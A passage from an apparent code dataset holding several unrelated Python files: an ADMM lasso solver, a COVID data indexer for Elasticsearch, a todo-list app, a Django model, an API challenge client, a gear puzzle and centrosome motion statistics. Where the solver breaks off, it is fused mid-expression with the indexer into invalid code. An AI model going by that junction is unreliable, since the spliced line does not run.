r3=np.tile(np.delete(np.arange(n_rows),boundary_rows),\n (n_boundary_cols,1)).flatten()\n c3=np.tile(boundary_cols,(n_rows-n_boundary_rows,1)).flatten('F')\n idx3=np.ravel_multi_index((r3,c3),(n_rows,n_cols),order='F')\n \n #these are the points on the col boundaries. So they are always the\n #(r,n_c) entery of one block and the (r,0) entry of the block to the right.\n for i,idx in enumerate(idx3):\n blk1,r_b1,c_b1=determineBlock(r3[i],c3[i])\n idx_in_blk1=np.ravel_multi_index((r_b1,c_b1),(n_r,n_c),order='F')\n I=np.tile(np.arange(idx*T,(idx+1)*T),2)\n J1=np.arange(blk1*n_x_blk+idx_in_blk1*T,\n blk1*n_x_blk+(idx_in_blk1+1)*T)\n blk2,r_b2,c_b2=(blk1+n_boundary_rows+1,r_b1,0)\n idx_in_blk2=np.ravel_multi_index((r_b2,c_b2),(n_r,n_c),order='F')\n J2=np.arange(blk2*n_x_blk+idx_in_blk2*T,\n blk2*n_x_blk+(idx_in_blk2+1)*T) \n \n I_vec.append(I);J_vec.append(np.hstack((J1,J2))) \n #===column boundary points===\n \n #===non-boundary points===\n idx4=np.delete(np.arange(n_cols*n_rows),np.hstack((idx1,idx2,idx3)))\n r4,c4=np.unravel_index(idx4,(n_rows,n_cols),'F')\n for i,idx in enumerate(idx4):\n blk,r_b,c_b=determineBlock(r4[i],c4[i])\n idx_in_blk=np.ravel_multi_index((r_b,c_b),(n_r,n_c),order='F')\n I=np.arange(idx*T,(idx+1)*T)\n J=np.arange(blk*n_x_blk+idx_in_blk*T,blk*n_x_blk+(idx_in_blk+1)*T)\n \n I_vec.append(I);J_vec.append(J) \n \n I_vec=np.hstack(I_vec);J_vec=np.hstack(J_vec)\n A=spmatrix(np.ones(I_vec.size),I_vec,J_vec,\n size=(I_vec.max()+1,J_vec.max()+1)) \n #===non-boundary points===\n \n return A\n\n\n\ndef compute_primal(Y,v,D,Kinv,alpha,rho):\n u = -D.T*v #compute u \n Y2=mul(Kinv,Y**2)\n z1=u-Kinv+rho*alpha \n W=matrix(np.real( lambertw(mul((Y2/rho),exp(-z1/rho))) ))\n beta= W +(z1/rho)\n\n return beta\n \ndef x_update(Y,D,G,h,Kinv,alpha,rho):\n '''\n This function performs the x-update step of the ADMM algorithm.\n See Boyd et al, 2010, page 55.\n ''' \n\n m,n=D.size\n ki=matrix(Kinv)\n \n def F(v=None,z=None): \n if v is None: return 0,matrix(0.0,(m,1))\n \n u = -D.T*v #compute u\n \n #===define some auxilary variables===\n Y2=mul(ki,Y**2)\n z1=u-ki+rho*alpha \n \n W=matrix(np.real( lambertw(mul((Y2/rho),exp(-z1/rho))) ))\n h_opt= W +(z1/rho)\n dh_to_du=(1/rho)*(div(1,1+W))\n z2=mul(Y2,exp(-h_opt))\n z3=z2+z1-rho*h_opt\n #===define some auxilary variables===\n \n #====compute f===\n f=sum( mul(u,h_opt)-mul(ki,h_opt)-z2-(rho/2)*(h_opt-alpha)**2 )\n #====compute f===\n \n #===compute Jacobian=== \n df_to_du=h_opt+mul(dh_to_du,z3)\n Df = -df_to_du.T*D.T\n if z is None: return f, Df \n #===compute Jacobian=== \n \n #===compute Hessian===\n d2h_to_du2=(1/rho**2)*div(W,(1+W)**3)\n d2f_to_du2=mul(d2h_to_du2,z3)+mul(dh_to_du,2-mul(z2+rho,dh_to_du))\n H=D*spdiag(mul(z[0],d2f_to_du2))*D.T\n #===compute Hessian===\n \n return f, Df, H \n\n solvers.options['maxiters']=500;solvers.options['show_progress']=False\n sol=solvers.cp(F=F,G=G,h=h)\n v=sol['x'];#dual solution\n x=compute_primal(Y,v,D,matrix(Kinv),alpha,rho)#primal solution\n \n return x\n\ndef scale_h(h,K,lh_trend,T,nr_blk,nc_blk,r_D,c_D):\n '''\n Let D (the matrix in generalized lasso) have size (r_Dxc_D).\n We have h^T=[1_(c_D)|L_t|L_s|L_lh|L_t|L_s|L_lh] where:\n 1_(c_D) is a (c_Dx1) vector of ones. c_D is the no. of columns of D.\n L_t=lam_t*1_(nt) where nt=(T-2)*nr_blk*nc_blk is the number of \n temporal constraints.\n L_s=lam_s*1_(ns) where ns=r_D-nt is the number of spatial constraints.\n L_lh=lam_t*1_(nlh) where nlh=n_years*nr_blk*nc_blk is the number\n of long horizon constraints. If lh_trend is False `h` does not \n include this part.\n This function repalces each element of L_t by lam_t/k_(i,j) where \n k_(i,j) is the number of \n local variables corresponding to each global variable at position (i,j)\n on the grid. Note that there are T-2 temporal constraints corresponding \n to each position (i,j) on the grid and k_(i,j) is the same for all \n of them. \n '''\n\n n_t=nr_blk*nc_blk*(T-2);\n K=K[0::T]\n K1=matrix(np.tile(K,(T-2,1)).reshape((n_t,1),order='F'))\n h[c_D:(c_D+n_t)]=mul(h[c_D:(c_D+n_t)],K1)\n \n if lh_trend:\n n_year=T/52\n n_lh=(n_year-2)*nr_blk*nc_blk;n_s=r_D-n_lh-n_t\n K2=matrix(np.tile(K,(n_year-2,1)).reshape((n_lh,1),order='F'))\n h[(c_D+n_t+n_s):(c_D+n_t+n_s+n_lh)]=\\\n mul(h[(c_D+n_t+n_s):(c_D+n_t+n_s+n_lh)],K2)\n h[(c_D+r_D):(c_D+r_D+n_t)]=mul(h[(c_D+r_D):(c_D+r_D+n_t)],K1)\n h[(h.size[0]-n_lh):]=mul(h[(h.size[0]-n_lh):],K2)\n else:\n h[(c_D+r_D):(c_D+r_D+n_t)]=mul(h[(c_D+r_D):(c_D+r_D+n_t)],K1)\n \n return h\n\n\ndef consensusADMM_fit(dataMat,destDir,metadata,\n lam_t_vec,lam_s_vec,rho=.1,\n n_r_b=2,n_c_b=2,\n maxIter=1000,freq=100,\n lh_trend=True,wrapAround=True,\n earlyStopping=True,patience=2,tol=.1):\n\n #===metadata===\n n_rows,n_cols,T=(metadata['n_rows'],metadata['n_cols'],metadata['T']) \n #===metadata===\n \n #===check the compatability of grid size with sub-blocks size===\n if (((n_rows-1)%(n_r_b-1)!=0) or ((n_cols-1)%(n_c_b-1)!=0)):\n msg='In current implementation, n_rows-1 and n_cols-1 should be'+\\\n 'divisable by (n_r_b-1) and (n_c_b)-1, respectively.'\n raise ValueError(msg)\n #===check the compatability of grid size with sub-blocks size===\n \n #===convert to cvxopt matrix===\n Y=matrix(np.asarray(dataMat,dtype='float64').flatten())\n y_flat=dataMat.flatten()\n del dataMat;gc.collect()\n #===convert to cvxopt matrix===\n \n #===partition data===\n n_x_b=n_r_b*n_c_b*T#no. of local variables in each block\n A=ComputeLocToGlobVarTransform(n_rows,n_cols,T,n_r_b,n_c_b)\n n_z,n_x=A.size\n \n I=np.array(A.I).flatten();J=np.array(A.J).flatten()\n y_partitioned=np.zeros(n_x)\n y_partitioned[J]=y_flat[I]\n del y_flat;gc.collect()\n n_blocks=y_partitioned.size/n_x_b\n y_partitioned=y_partitioned.reshape((n_x_b,n_blocks),order='F')\n #each column of y_partitioned contains the data of a block \n #===partition data===\n \n #===compute K and Kinv===\n #K is no. of local variables corresponding each global variable and \n #Kinv is 1/K\n K=A*matrix(np.ones(A.size[1]))\n ki=np.array(div(1.,K)).flatten()\n Kinv=np.ones(n_x)\n Kinv[J]=ki[I]\n Kinv=Kinv.reshape((n_x_b,n_blocks),order='F')\n Kinv=np.ones(Kinv.shape)#???delete this\n del ki;gc.collect()\n #===compute no. of local variables corresponding each global variable===\n \n #===compute D===\n D=compute_cp_matrices(n_rows,n_cols,T,[],[],\n wrapAround=wrapAround,lh_trend=lh_trend,\n ifCompute_Gh=False)\n #===compute D===\n \n #===make sure the parameters are float===\n lam_t_vec=[float(lam_t) for lam_t in lam_t_vec]\n lam_s_vec=[float(lam_s) for lam_s in lam_s_vec]\n rho=float(rho)\n #===make sure the parameters are float=== \n\n #===compute solution for all lam_t and lam_s=== \n for i_t,lam_t in enumerate(lam_t_vec):\n for i_s,lam_s in enumerate(lam_s_vec): \n print('\\014')\n print('\\n'+ctime()+'...fitting model with lam_t=%.2f, lam_s=%.2f'%\\\n (lam_t,lam_s))\n \n #===initialize X,Z,W=== \n Z_hat=np.zeros((n_x_b,n_blocks))\n W=np.zeros((n_x_b,n_blocks));X=np.zeros((n_x_b,n_blocks))\n totalLoss=[]\n #===initialize X,Z,W===\n \n #===compute D,G,h for each block===\n #'b' means that these are computed for each block\n Db,Gb,hb=compute_cp_matrices(n_r_b,n_c_b,T,lam_t,lam_s,\n ifCompute_Gh=True,wrapAround=False,\n lh_trend=lh_trend)\n m_b,n_b=Db.size\n #===compute D,G,h for each block===\n \n #results filename \n result_fn = 'rho_'+str(rho)+'_lam_t_'+str(lam_t)+\\\n '_lam_s_'+str(lam_s)\n \n \n print('time iteration loss') \n\n #---ADMM loop---\n for it in range(maxIter): \n #---x-update---\n alpha=Z_hat-W\n for blk in range(n_blocks):\n hb=scale_h(hb,Kinv[:,blk],True,T,n_r_b,n_c_b,m_b,n_b)\n alpha_b=matrix(alpha[:,blk])\n Y_b=matrix(y_partitioned[:,blk])\n X[:,[blk]]=np.array(x_update(Y_b,Db,Gb,hb,Kinv[:,blk],\n alpha_b,rho))\n \n X_vec=matrix(X.flatten(order='F'))\n #---x-update---\n \n #---z-update---\n Z=div(A*X_vec,K)\n #---z-update---\n \n #---w-update---\n Z_hat=np.zeros(n_x)\n Z_hat[J]=np.array(Z).flatten()[I]\n Z_hat=Z_hat.reshape((n_x_b,n_blocks),order='F') \n \n W=W+X-Z_hat\n #---w-update---\n \n if ((it==0) or ((it+1)%freq==0)):\n totalLoss.append(computeLoss(Z,Y,D,lam_t,lam_s,\n T,n_rows,n_cols,lh_trend))\n print(ctime()+' %5.0f %.1f'\\\n %(it+1,totalLoss[-1]))\n if earlyStopping and (len(totalLoss)>patience):\n chng=100*np.abs(totalLoss[-patience]-\\\n totalLoss[-patience:])/\\\n totalLoss[-patience]\n #if change in totalLoss is less than tol%\n if np.max(chng)= len(data.index):\n to = len(data.index)\n percentage = int((position / len(data.index)) * 1000) / 10\n print(f'{percentage}% {position}/{len(data.index)}')\n bulk(es, get_section(data, position, to), index=index_name)\n if to >= len(data.index):\n return\n position += bulk_size\n\n\ndef get_section(data, frm, to):\n for i in range(frm, to):\n yield json.dumps(create_dict(data.iloc[i]))\n\n\ndef create_dict(row):\n year = row['Meldedatum'][0:4]\n month = row['Meldedatum'][5:7]\n day = row['Meldedatum'][8:10]\n date = year+'/'+month+'/'+day\n result = {'date': date,\n 'kreis': row['Landkreis'],\n 'land': row['Bundesland'],\n 'anzahlFall': int(row['AnzahlFall']),\n 'anzahlTodesfall': int(row['AnzahlTodesfall']),\n 'geschlecht': str(row['Geschlecht']),\n 'altersgruppe': str(row['Altersgruppe'])\n }\n return result\n\n\nif __name__ == '__main__':\n if es.indices.exists(index=index_name):\n print(f\"Deleting index '{index_name}'.\")\n es.indices.delete(index=index_name)\n time.sleep(5)\n\n print('Reading data.')\n df = pd.read_csv(file_name)\n\n print(f'Indexing {df.size} documents.')\n bulk_index(df)\n","repo_name":"txtData/rkiVisualizer","sub_path":"rki_indexer.py","file_name":"rki_indexer.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12160764370","text":"# Write your code here\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom datetime import datetime, timedelta\n\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\nBase = declarative_base()\n\n\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String, default='default_value')\n deadline = Column(Date, default=datetime.today())\n\n def __repr__(self):\n return self.task\n\n\nBase.metadata.create_all(engine)\n\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n# new_row = Table(task='Nothing to do!', deadline=datetime.strptime('04-09-2021', '%m-%d-%Y').date())\n# session.add(new_row)\n# session.add(Table(task='Visit an orphanage', deadline=datetime.today()))\n# session.add(Table(task='Analyze New product consumer-reception', deadline=datetime.today()))\n# session.add(Table(task='Visit an Ethiopia', deadline=datetime.today() + timedelta(days=2)))\n# session.commit()\n\nrows = session.query(Table).all()\ntoday = datetime.today()\nfor_today_rows = session.query(Table).filter(Table.deadline == today.date()).all()\nordered_rows = session.query(Table).order_by(Table.deadline).all()\ntomorrow = datetime.today() + timedelta(days=1)\ndelete_today = session.query(Table).filter(Table.deadline == datetime.today().date()).delete()\nspecific_rows_past_task = session.query(Table).filter(Table.deadline < datetime.today().date()).order_by(Table.deadline).all()\n\n\n# print(first_row.task)\n\ndef weeks_task():\n dl = today.date()\n for n_day in range(7):\n tasks = session.query(Table).filter(Table.deadline == dl).all()\n # print(tasks)\n if not tasks:\n print(f\"{dl.strftime('%A %#d %b')}:\")\n print(\"Nothing to do!\")\n print()\n else:\n print(f\"{dl.strftime('%A %#d %b')}:\")\n sn = 1\n for todo in tasks:\n task_to_do = todo.task\n print(f\"{sn}. {task_to_do}\")\n sn += 1\n print()\n\n dl += timedelta(days=1)\n\n\ndef all_task():\n everything_todo = session.query(Table).order_by(Table.deadline).all()\n sn = 0\n for i in everything_todo:\n sn += 1\n time_frame_day = i.deadline.day\n time_frame_month = i.deadline.strftime('%b')\n time_frame = str(f'{time_frame_day} {time_frame_month}')\n print(f'{sn}. {i}. {time_frame}')\n\n\ndef delete_task():\n rows_to_delete = session.query(Table).all()\n to_delete = session.query(Table).filter(Table.deadline).all()\n sn = 0\n if len(to_delete) > 0:\n for i in rows_to_delete:\n sn += 1\n print(f'{sn}. {i}.', i.deadline.strftime('%#d %b'))\n selected = int(input(\"> \"))\n deleted = rows_to_delete[selected - 1]\n print(deleted)\n session.delete(deleted)\n session.commit()\n print(\"The task has been deleted!\")\n else:\n print(\"Nothing to delete\")\n session.commit()\n\n\ndef missed_task():\n session.commit()\n task_missed = session.query(Table).filter(Table.deadline < datetime.today().date()).order_by(Table.deadline).all()\n sn = 0\n for i in task_missed:\n sn += 1\n i_day = i.deadline.day\n i_month = i.deadline.strftime('%b')\n print(f'{sn}. {i}. {i_day} {i_month}')\n\n\ndef selection():\n session.commit()\n today_task = for_today_rows\n menu = [\"1) Today's tasks\", \"2) Week's tasks\", \"3) All tasks\", \"4) Missed tasks\", \"5) Add task\", \"6) Delete task\", \"0) Exit\"]\n for option in menu:\n print(f'{option}')\n selected = int(input(\"enter an option \"))\n\n if selected == 6:\n session.commit()\n print(\"\\n\")\n print(\"Choose the number of the task your want to delete:\\n\")\n delete_task()\n session.commit()\n print(\"\\n\")\n selection()\n\n if selected == 5:\n print(\"\\n\")\n print(\"Enter task\")\n new_row = Table(task=input(\"> \"),\n deadline=datetime.strptime(input('Enter deadline\\n>'), '%Y-%m-%d').date())\n session.add(new_row)\n session.commit()\n print(\"The task has been added\")\n print(\"\\n\")\n selection()\n\n if selected == 4:\n session.commit()\n print(\"\\n\")\n print(\"Missed task:\")\n missed_task()\n print(\"\\n\")\n selection()\n\n if selected == 3:\n print(\"\\n\")\n print(\"All tasks:\")\n all_task()\n print(\"\\n\")\n selection()\n\n if selected == 2:\n print('\\n')\n weeks_task()\n selection()\n # print(all_task())\n\n if selected == 1 and len(rows) > 1:\n print(\"\\n\")\n\n time_frame_day = datetime.today().day\n time_frame_month = datetime.today().strftime('%b')\n today_date = str(f'Today {time_frame_day} {time_frame_month}:')\n print(today_date)\n for i in today_task:\n print(i)\n print(\"Nothing to do\")\n # print(new_row.task)\n print(\"\\n\")\n selection()\n\n elif selected == 1 and len(today_task) <= 0:\n print(\"\\n\")\n print(\"Today:\")\n print('Nothing to do!')\n print(\"\\n\")\n selection()\n\n else:\n print(\"\\n\")\n print(\"Bye!\")\n session.commit()\n\n\nselection()\n","repo_name":"Victor-UGB/Todo-list","sub_path":"task/todolist/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27758436245","text":"import uuid\n\nfrom django.conf import settings\nfrom django.db import models\nfrom recurrence import deserialize\nfrom recurrence import serialize\nfrom recurrence.fields import RecurrenceField\n\n\nclass CustomAction(models.Model):\n uuid = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)\n\n name = models.CharField(max_length=255)\n description = models.TextField()\n owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\n recurrence = RecurrenceField()\n\n def get_rule(self):\n if self.recurrence.rrules is not None:\n if len(self.recurrence.rrules) > 0:\n return serialize(self.recurrence.rrules[0])\n return None\n\n def set_rule(self, i):\n self.recurrence = deserialize(i)\n\n rule = property(get_rule, set_rule)\n\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n","repo_name":"Shattenjagger/d_campaigns","sub_path":"campaigns/models/custom_action.py","file_name":"custom_action.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34504611844","text":"\"\"\"示例 7-16 使用 clock 装饰器\"\"\"\n\nimport time\nfrom ch7.clockdeco1 import clock\n\n\n@clock\ndef snooze(seconds):\n time.sleep(seconds)\n\n\n@clock\ndef factorial(n):\n return 1 if n < 2 else n*factorial(n-1)\n\n\nif __name__ == \"__main__\":\n print(\"*\" * 40, 'Calling snozze(.123)')\n snooze(.123)\n print(\"*\" * 40, 'Calling factorial(6)')\n print('6! = ', factorial(6))","repo_name":"sbwcwso/fluent_python_notes","sub_path":"ch7/clockdeco_demo.py","file_name":"clockdeco_demo.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4018696670","text":"import requests\nimport json\nimport threading\n\nfrom collections import defaultdict\n\nclass Cox():\n def __init__(self):\n self.url_prefix = \"http://api.coxauto-interview.com/api/\"\n self.datasetId = \"\"\n self.vehicleIds = []\n self.all_dealers = defaultdict(list)\n self.all_vehicles = {}\n self.threads = []\n self.d_threads = []\n\n ''' Sets up get method with the datasetID api url and retrieves the dataset ID. '''\n def get_dataset_id(self):\n try:\n dataset_url = f\"{self.url_prefix}datasetId\"\n datasetId = requests.get(dataset_url).json()[\"datasetId\"]\n self.datasetId = datasetId\n except requests.exceptions.RequestException as error:\n \tprint(\"Error: \", error)\n\n ''' Sets up get method with the vehicles api url and retrieves all the vehicle IDs. '''\n def get_vehicle_ids(self):\n try:\n vehicleIds_url = f\"{self.url_prefix}{self.datasetId}/vehicles\"\n vehicleIds = requests.get(vehicleIds_url).json()[\"vehicleIds\"]\n self.vehicleIds = vehicleIds\n except requests.exceptions.RequestException as error:\n \tprint(\"Error: \", error)\n\n ''' Make a get request with each vehicle ID if it hasn't been visited yet. '''\n def get_vehicle_info(self, vehicleId):\n if vehicleId not in self.all_vehicles:\n vehicle_url = f\"{self.url_prefix}{self.datasetId}/vehicles/{vehicleId}\"\n vehicle_info = requests.get(vehicle_url).json()\n self.all_vehicles[vehicleId] = vehicle_info\n\n ''' Compiles all vehicle requests needed into threads and runs them all simultaneously. '''\n def compile_vehicle_threads(self):\n for vehicleId in self.vehicleIds:\n d = threading.Thread(target=self.get_vehicle_info, args=(vehicleId,))\n self.threads.append(d)\n for thread in self.threads:\n thread.start()\n for thread in self.threads:\n thread.join()\n\n ''' Make a get request with each dealer ID if it hasn't been visited yet. '''\n def get_dealer_info(self, vehicleId):\n dealerId = self.all_vehicles[vehicleId][\"dealerId\"]\n if dealerId not in self.all_dealers:\n dealer_url = f\"{self.url_prefix}{self.datasetId}/dealers/{dealerId}\"\n dealer_info = requests.get(dealer_url).json()\n self.all_dealers[dealerId] = dealer_info\n\n ''' Compiles all dealer requests needed into threads and runs them all simultaneously. '''\n def compile_dealer_threads(self):\n for vehicleId in self.vehicleIds:\n d_thread = threading.Thread(target=self.get_dealer_info, args=(vehicleId,))\n self.d_threads.append(d_thread)\n for d_thread in self.d_threads:\n d_thread.start()\n for d_thread in self.d_threads:\n d_thread.join()\n\n ''' Retrieves info on each vehicle and the corresponding dealer, and then stores it all in a dictionary. '''\n def add_vehicles_to_dealers(self):\n for vehicleId in self.vehicleIds:\n dealerId = self.all_vehicles[vehicleId][\"dealerId\"]\n self.all_dealers[dealerId][\"vehicles\"] = self.all_dealers[dealerId].get(\"vehicles\",[])\n self.all_dealers[dealerId][\"vehicles\"].append({k: v for k,v in self.all_vehicles[vehicleId].items() if k != \"dealerId\"})\n\n ''' Initializes all required data and posts the answer. '''\n def get_answer(self):\n self.get_dataset_id()\n self.get_vehicle_ids()\n self.compile_vehicle_threads()\n self.compile_dealer_threads()\n self.add_vehicles_to_dealers()\n dealers = {\"dealers\": list(self.all_dealers.values())}\n answer_url = f\"{self.url_prefix}{self.datasetId}/answer\"\n answer_response = requests.post(answer_url, json=dealers).json()\n total_seconds = (answer_response[\"totalMilliseconds\"] / 1000) % 60\n print(f\"Success: {answer_response['success']}\")\n print(f\"Total time: {total_seconds} seconds\")\n return answer_response\n\nif __name__ == '__main__':\n cox = Cox()\n cox.get_answer()\n","repo_name":"ChadLei/cox-automotive-challenge","sub_path":"swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19479016971","text":"\r\ndef rotateGear(gearState, direction) :\r\n\tif direction == 1 : # rotating clock direction\r\n\t\tgearState = [gearState[7]] + gearState[0:7]\r\n\r\n\telif direction == -1 : # rotating un-clock direction\r\n\t\tgearState = gearState[1:8] + [gearState[0]]\r\n\r\n\treturn gearState\r\n\r\n\r\ndef cycleGear(gearNum, direction, gears) :\r\n\trotateCheck = [0,0,0,0] # decide rotate or not list\r\n\r\n\trotateCheck[gearNum] += direction # given gear rotate by given direction\r\n\r\n\toriginGearNum = gearNum\r\n\toriginDirection = direction\r\n\r\n\tif gearNum > 0 : # rotating gear proceeding to left\r\n\t\t\r\n\t\tfor cycleIndex in range(gearNum) :\t\t\r\n\t\t\t\r\n\t\t\tif gears[gearNum][6] != gears[gearNum-1][2] and gearNum > 0 :\r\n\t\t\t\t\r\n\t\t\t\tdirection *= (-1) # change the direction\r\n\t\t\t\trotateCheck[gearNum-1] += direction\r\n\r\n\t\t\t\tgearNum -= 1 # proceed to left gear\r\n\t\t\r\n\t\t\telse :\r\n\t\t\t\tbreak\r\n\t\r\n\tgearNum = originGearNum\r\n\tdirection = originDirection\r\n\r\n\tif gearNum < 3 : # rotating gear proceeding to right\r\n\r\n\t\tfor cycleIndex in range(3 - gearNum) :\r\n\r\n\t\t\tif gears[gearNum][2] != gears[gearNum+1][6] and gearNum < 3 :\r\n\r\n\t\t\t\tdirection *= (-1) # change the direction\r\n\t\t\t\trotateCheck[gearNum+1] += direction\r\n\t\t\t\t\r\n\t\t\t\tgearNum += 1 # proceed to right gear\r\n\t\t\r\n\t\t\telse :\r\n\t\t\t\tbreak\r\n\r\n\t# print(f\"rotation : {rotateCheck}\")\r\n\r\n\tfor rotatingIndex in range(len(rotateCheck)) :\r\n\t\t\r\n\t\tif rotateCheck[rotatingIndex] != 0 :\r\n\t\t\r\n\t\t\tgears[rotatingIndex] = rotateGear(gears[rotatingIndex], rotateCheck[rotatingIndex]) # rotate gears refer to 'rotateCheck'\r\n\r\n\treturn gears # return all rotated gears list\r\n\r\n\r\nif __name__ == \"__main__\" :\r\n\r\n\tgearList = []\r\n\r\n\tfor gearInputIndex in range(4) :\r\n\t\tsingleGear = list(input())\r\n\r\n\t\tfor gearIndex in range(len(singleGear)) :\r\n\t\t\tsingleGear[gearIndex] = int(singleGear[gearIndex]) # convert strings to integers\r\n\r\n\t\tgearList.append(singleGear)\r\n\t\t\r\n\t\t# 3시방향 : 2 / 9시방향 : 6\r\n\t\r\n\t#print(f\"cycle before : {gearList}\")\r\n\r\n\trotateTimes = int(input())\r\n\r\n\tfor rotateIndex in range(rotateTimes) :\r\n\t\trotateInput = input().split()\r\n\r\n\t\trotateGearNum = int(rotateInput[0]) - 1 # subtract 1, because match to array number\r\n\t\trotateDirection = int(rotateInput[1])\r\n\r\n\t\tgearList = cycleGear(rotateGearNum, rotateDirection, gearList) # decide given and surrounded gears are rotated or not \r\n\t\t\r\n\t\t#print(f\"cycle {rotateIndex} : {gearList}\")\r\n\r\n\tscore = 0\r\n\t\r\n\tfor scoringIndex in range(len(gearList)) :\r\n\t\tscore += gearList[scoringIndex][0] * (2 ** scoringIndex) # add the scores\r\n\r\n\tprint(score)\r\n","repo_name":"shasuri/AlgorithmStudy","sub_path":"albbu/3rd_week/14891.py","file_name":"14891.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"71993690327","text":"\"\"\"\nComputes classic and statistical mechanics\n\nAll the formulas intended for using with the pandas apply funcion on a groupby.\n\nWhen dataframe is expressed as df, then implies a normal dataframe. On th other hand, when dfi is mentioned,\nit means that the Dataframe must be frame indexed.\n\n\"\"\"\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\n\ndef speed_acc(df, x='x', y='y', time='time', frame='frame'):\n df = df.set_index(frame).sort_index()\n df.loc[:, 'dist'] = (df[x] ** 2 + df[y] ** 2).map(np.sqrt)\n d = df.loc[:, [x, y, 'dist', time]].diff().rename(\n columns={x: 'dx', y: 'dy', 'dist': 'dD', time: 'dt'})\n df.loc[:, 'speed'] = d.dD / d.dt\n df.loc[:, 'acc'] = d.dD.diff() / d.dt\n return df.reset_index()\n\n\ndef velocity(df, x='x', y='y', time='time', frame='frame'):\n df = df.set_index(frame).sort_index()\n df = df.loc[[x, y, time]].diff().rename(columns={x: 'Vx', y: 'Vy', time: 'dt'})\n df.loc[:, 'Vx'] = df['Vx'] / df['dt']\n df.loc[:, 'Vy'] = df['Vx'] / df['dt']\n return df.reset_index()\n\n\ndef avg_speed(df, frame='frame', time='time', centrosome_label_col='centrosome'):\n df = df.set_index(frame).sort_index()\n dfa = df[df[centrosome_label_col] == 'A']\n dfb = df[df[centrosome_label_col] == 'B']\n if not dfa.empty and not dfb.empty:\n ddi = np.sqrt((dfb['x'].iloc[0] - dfa['y'].iloc[0]) ** 2 + (dfb['y'].iloc[0] - dfa['y'].iloc[0]) ** 2)\n ddf = np.sqrt((dfb['x'].iloc[-1] - dfa['y'].iloc[-1]) ** 2 + (dfb['y'].iloc[-1] - dfa['y'].iloc[-1]) ** 2)\n dd = np.sqrt((ddf - ddi) ** 2)\n dt = df[time].iloc[-1] - df[time].iloc[0]\n return dd / dt\n\n\ndef get_speed_acc(df, x='x', y='y', time='time', frame='frame', group=None):\n if df.empty:\n raise Exception('df is empty')\n kwargs = {'x': x, 'y': y, 'time': time, 'frame': frame}\n dout = df.groupby(group).apply(speed_acc, **kwargs).reset_index(drop=True)\n return dout\n\n\ndef get_speed_acc_rel_to(df, x='x', y='y', rx='rx', ry='ry', time='time', frame='frame', group=None):\n if df.empty:\n raise Exception('df is empty')\n kwargs = {'x': x, 'y': y, 'time': time, 'frame': frame}\n dout = df.groupby(group).apply(speed_acc, **kwargs).reset_index(drop=True)\n return dout\n\n\ndef dist_vel_acc_centrosomes(df, cell_unit_idx=[],\n time_col='time', frame_col='frame',\n x_col='x', y_col='y',\n centrosome_label_col='centrosome'):\n def dist_between(df):\n dfu = df.set_index([frame_col, centrosome_label_col]).sort_index().unstack(centrosome_label_col)\n ddx = dfu[x_col]['A'] - dfu[x_col]['B']\n ddy = dfu[y_col]['A'] - dfu[y_col]['B']\n\n dist = (ddx ** 2 + ddy ** 2).map(np.sqrt)\n time = dfu[time_col].max(axis=1)\n dt = time.diff()\n dfu.loc[:, ('DistCentr', 'A')] = dist\n dfu.loc[:, ('DistCentr', 'B')] = dist\n dfu.loc[:, ('SpeedCentr', 'A')] = dist.diff() / dt\n dfu.loc[:, ('SpeedCentr', 'B')] = dist.diff() / dt\n dfu.loc[:, ('AccCentr', 'A')] = dist.diff().diff() / dt\n dfu.loc[:, ('AccCentr', 'B')] = dist.diff().diff() / dt\n return dfu.stack().reset_index()\n\n df = df.groupby(cell_unit_idx).apply(dist_between)\n return df.reset_index(drop=True)\n\n\ndef center_df(df):\n df = df.set_index('frame').sort_index()\n time_ini = df['time'].iloc[0]\n dist_ini = df['dist'].iloc[0]\n df.loc[:, 'time_i'] = df['time'] - time_ini\n df.loc[:, 'dist_i'] = df['dist'] - dist_ini\n return df.reset_index()\n\n\ndef get_center_df(df, time='time', dist='dist', frame='frame', group=None):\n df = df.rename(columns={dist: 'dist', frame: 'frame', time: 'time'})\n dout = df.groupby(group).apply(center_df)\n return dout.reset_index(drop=True)\n\n\ndef get_msd(df, x='x', y='y', time='time', frame='frame', group=None):\n logger.debug('computing msd')\n\n def msd(df):\n \"\"\"\n Computes Mean Square Displacement as defined by:\n\n {\\rm {MSD}}\\equiv \\langle (x-x_{0})^{2}\\rangle ={\\frac {1}{N}}\\sum _{n=1}^{N}(x_{n}(t)-x_{n}(0))^{2}\n \"\"\"\n df = df.set_index(frame).sort_index()\n x0, y0 = df[x].iloc[0], df[y].iloc[0]\n _msdx = df.loc[:, x].apply(lambda x: (x - x0) ** 2)\n _msdy = df.loc[:, y].apply(lambda y: (y - y0) ** 2)\n df.loc[:, 'msd'] = _msdx + _msdy\n return df.reset_index()\n\n dfout = df.groupby(group).apply(msd)\n return dfout.reset_index(drop=True)\n\n\ndef _msd_tag(df, time='time', centrosome_label='centrosome'):\n logger.debug('classifying msd')\n pd.set_option('mode.chained_assignment', None)\n # with pd.set_option('mode.chained_assignment', 'raise')\n dfreg = 